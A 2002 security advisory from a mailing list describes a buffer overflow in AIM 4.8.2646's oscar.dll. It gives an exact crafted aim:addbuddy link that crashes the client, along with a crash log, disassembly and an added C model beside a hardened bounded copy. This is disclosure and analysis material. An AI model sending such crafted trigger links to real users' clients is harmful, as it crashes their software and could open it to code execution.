[NEWS] AIM Remote Buffer Overflow
From: support@securiteam.com    Date: 03/09/02
From: support@securiteam.com To: list@securiteam.com Date: Sat, 9 Mar 2002 13:01:17 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
AIM Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
AOL's Instant Messenger client (AIM) contains a buffer overflow in the
file oscar.dll. A specially crafted aim: hyperlink triggers the overflow,
overwriting the stack and possibly allowing arbitrary code execution.
DETAILS
Vulnerable systems:
AIM version 4.8.2646
The buffer overflow is triggered by sending a specially crafted message
(an aim: hyperlink) to an AIM user.
To reproduce the buffer overflow:
1) Make sure AIM 4.8.2646 is installed.
2) Open a new IM window and click the link button to set up a hyperlink for
your buddy.
3) Enter exactly the following text as the link:
aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,
12345678,12345678,12345678,12345678,12345678,12345678&groupname=
12345678,12345678,12345678,12345678,12345678,12345678,12345678
,12345678,12345678,12345678,
4) The text itself can be anything as long as it keeps the format: each
comma-separated word is 8 characters long, with 11 words in the screenname
parameter and 10 words in the groupname parameter.
5) The client crashes (and Dr. Watson writes a crash dump) as soon as the
hyperlink is clicked on either side (by you or by your buddy).
The following was taken from the Dr. Watson log after the crash:
function: o_strncpy
1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c
1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c
1218b4ff 7419 jz LoadRendezvousString+0x39f6 (
1218b501 8a06 mov al,[esi]
1218b503 8807 mov [edi],al
1218b505 47 inc edi
1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c
1218b509 46 inc esi
1218b50a 43 inc ebx
1218b50b 8a06 mov al,[esi]
FAULT ->1218b50d 8807 mov [edi],al
1218b50f 47 inc edi
1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c
1218b513 46 inc esi
1218b514 43 inc ebx
1218b515 803e00 cmp byte ptr [esi],0x0
1218b518 75cf jnz LoadRendezvousString+0x3bc5 (
1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c
1218b51d 3bf9 cmp edi,ecx
1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+
1218b521 2bcf sub ecx,edi
1218b523 33c0 xor eax,eax
Below is the corresponding portion of the disassembly of o_strncpy in oscar.dll:
text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61 j
text:1218B4E9 cmp edi, [ebp+lpsz]
text:1218B4EC jnb short loc_1218B533
text:1218B4EE push esi ; lpsz
text:1218B4EF call ds:CharNextA
text:1218B4F5 cmp eax, ebx
text:1218B4F7 jnz short loc_1218B50B
text:1218B4F9 mov eax, [ebp+arg_0]
text:1218B4FC cmp eax, [ebp+lpsz]
text:1218B4FF jz short loc_1218B51A
text:1218B501 mov al, [esi]
text:1218B503 mov [edi], al
text:1218B505 inc edi
text:1218B506 inc [ebp+arg_0]
text:1218B509 inc esi
text:1218B50A inc ebx
text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40 j
text:1218B50B mov al, [esi]
text:1218B50D mov [edi], al ; <<<---HERE IS THE P
text:1218B50F inc edi
text:1218B510 inc [ebp+arg_0]
text:1218B513 inc esi
text:1218B514 inc ebx
text:1218B515 cmp byte ptr [esi], 0
text:1218B518 jnz short loc_1218B4E9
text:1218B51A loc_1218B51A: ; CODE XREF: o_s
text:1218B51A ; o_strncpy+48 j
text:1218B51A mov ecx, [ebp+lpsz]
text:1218B51D cmp edi, ecx
text:1218B51F jnb short loc_1218B533
text:1218B521 sub ecx, edi
text:1218B523 xor eax, eax
text:1218B525 mov edx, ecx
text:1218B527 shr ecx, 2
text:1218B52A repe stosd
text:1218B52C mov ecx, edx
text:1218B52E and ecx, 3
text:1218B531 repe stosb
text:1218B533
Here are the stack variables of o_strncpy as shown by the disassembler:
00000000 s db 4 dup(?)
00000004 r db 4 dup(?)
00000008 arg_0 dd ?
0000000C lpsz dd ? ; offset (FFFFFFFF)
00000010 arg_8 dd ?
This issue has not been tested against third-party clients that implement
the OSCAR protocol.
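The following C program is an added example; it is not code from the advisory, from AOL or from oscar.dll. It renders the o_strncpy loop listed above as C so that the position of each bound check can be read in one place, and puts a bounded copy beside it that checks before every write. The reading of the listing is an assumption: edi is taken as the write pointer, esi as the read pointer, lpsz as the end of the destination, arg_0 as a second copy of the write position, and ebx as the address two bytes past esi, so that CharNextA returning ebx means a two-byte (DBCS) character. The listing does not show the function prologue, where ebx is initialised, or how the caller computes lpsz, and the advisory does not say which of these paths the aim: link reaches. The names char_next, o_strncpy_model, bounded_copy and CAP, the Shift-JIS lead-byte ranges used as a stand-in for CharNextA, the 8-byte destination and the canary byte after it are all constructed for this demonstration.

```c
/* Added example: a C rendering of the o_strncpy loop from the listing above,
 * beside a bounded copy. Not code from the advisory or from oscar.dll; the
 * register-to-variable mapping, the CharNextA stand-in, the 8-byte destination
 * and the canary byte are assumptions made for this demonstration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

enum { CAP = 8 };   /* constructed destination size; lpsz = dst + CAP */

/* Stand-in for CharNextA on a DBCS code page (assumption): bytes 0x81-0x9F and
 * 0xE0-0xFC are treated as Shift-JIS lead bytes that carry one trail byte. */
static const unsigned char *char_next(const unsigned char *p)
{
    unsigned char c = *p;
    if (c == 0)
        return p;
    if (((c >= 0x81 && c <= 0x9F) || (c >= 0xE0 && c <= 0xFC)) && p[1] != 0)
        return p + 2;
    return p + 1;
}

/* The loop as it reads from loc_1218B4E9: edi -> d, esi -> s, lpsz -> e,
 * arg_0 -> arg0, "CharNextA(esi) == ebx" -> two-byte character. */
static void o_strncpy_model(char *dst, char *end, const char *src)
{
    unsigned char *d = (unsigned char *)dst;
    unsigned char *e = (unsigned char *)end;
    const unsigned char *s = (const unsigned char *)src;
    unsigned char *arg0 = d;               /* [ebp+arg_0], advanced together with edi */

    while (*s != 0) {                      /* 1218B515: cmp byte ptr [esi], 0 */
        if (d >= e)                        /* 1218B4E9: cmp edi, lpsz / jnb -> exit, no fill */
            return;
        if (char_next(s) == s + 2) {       /* 1218B4EF..4F7: two-byte character */
            if (arg0 == e)                 /* 1218B4FC: cmp arg_0, lpsz / jz -> fill */
                break;
            *d++ = *s++;                   /* 1218B501..509: lead byte */
            arg0++;
        }
        *d++ = *s++;                       /* 1218B50B..514: shared write, no check of its own */
        arg0++;
    }
    if (d < e)                             /* 1218B51A..531: zero-fill up to lpsz */
        memset(d, 0, (size_t)(e - d));
}

/* Hardened form: room is checked before every write, a two-byte character that
 * would be split at the boundary is dropped whole, and the result is always
 * NUL-terminated inside [dst, dst+cap). Returns the number of bytes copied. */
static size_t bounded_copy(char *dst, size_t cap, const char *src)
{
    const unsigned char *s = (const unsigned char *)src;
    size_t n = 0;
    if (cap == 0)
        return 0;
    while (*s != 0) {
        size_t w = (size_t)(char_next(s) - s);   /* 1 or 2 bytes */
        if (n + w >= cap)                         /* keep one byte for the NUL */
            break;
        memcpy(dst + n, s, w);
        n += w;
        s += w;
    }
    dst[n] = '\0';
    return n;
}

/* Constructed harness: copy src into an 8-byte slot guarded by a canary byte
 * stored in the same array; returns 1 if the copy overwrote the canary. */
static int model_clobbers_canary(const char *src)
{
    unsigned char mem[CAP + 1];
    memset(mem, 'X', sizeof mem);
    mem[CAP] = 0xA5;
    o_strncpy_model((char *)mem, (char *)mem + CAP, src);
    return mem[CAP] != 0xA5;
}

/* Same harness for the hardened copy; the copied string is returned in out
 * (which must hold CAP bytes). */
static int hardened_clobbers_canary(const char *src, char *out)
{
    unsigned char mem[CAP + 1];
    memset(mem, 'X', sizeof mem);
    mem[CAP] = 0xA5;
    bounded_copy((char *)mem, CAP, src);
    memcpy(out, mem, CAP);
    return mem[CAP] != 0xA5;
}

/* 1 if the hardened copy of src yields exactly expect and leaves the canary intact. */
static int hardened_yields(const char *src, const char *expect)
{
    char out[CAP];
    return hardened_clobbers_canary(src, out) == 0 && strcmp(out, expect) == 0;
}

int main(void)
{
    const char *ascii = "12345678,12345678,";   /* constructed: the advisory's word shape */
    const char *dbcs  = "abcdefg\x81\x40";      /* constructed: two-byte char on the last slot */

    printf("model, ASCII input        : overrun=%d\n", model_clobbers_canary(ascii));
    printf("model, DBCS at boundary   : overrun=%d\n", model_clobbers_canary(dbcs));
    printf("hardened, DBCS at boundary: ok=%d (result \"abcdefg\")\n",
           hardened_yields(dbcs, "abcdefg"));
    return 0;
}
```

Run stand-alone, main() shows that ASCII input shaped like the advisory's 8-character words stops at lpsz in both versions, while a two-byte character landing on the last slot makes the model write one byte past the end, because the shared write at loc_1218B50B is guarded only by the checks that precede the lead byte; the hardened copy drops the character that does not fit and NUL-terminates inside the buffer. A one-byte overrun of this kind is not what the advisory attributes the crash to, and the log alone does not settle the root cause; the general rule the example illustrates is that every write in a copy loop needs its own bound, including the second byte of a multi-byte character and the terminator.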
ADDITIONAL INFORMATION
The information has been provided by NtWaK0 & Recon.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.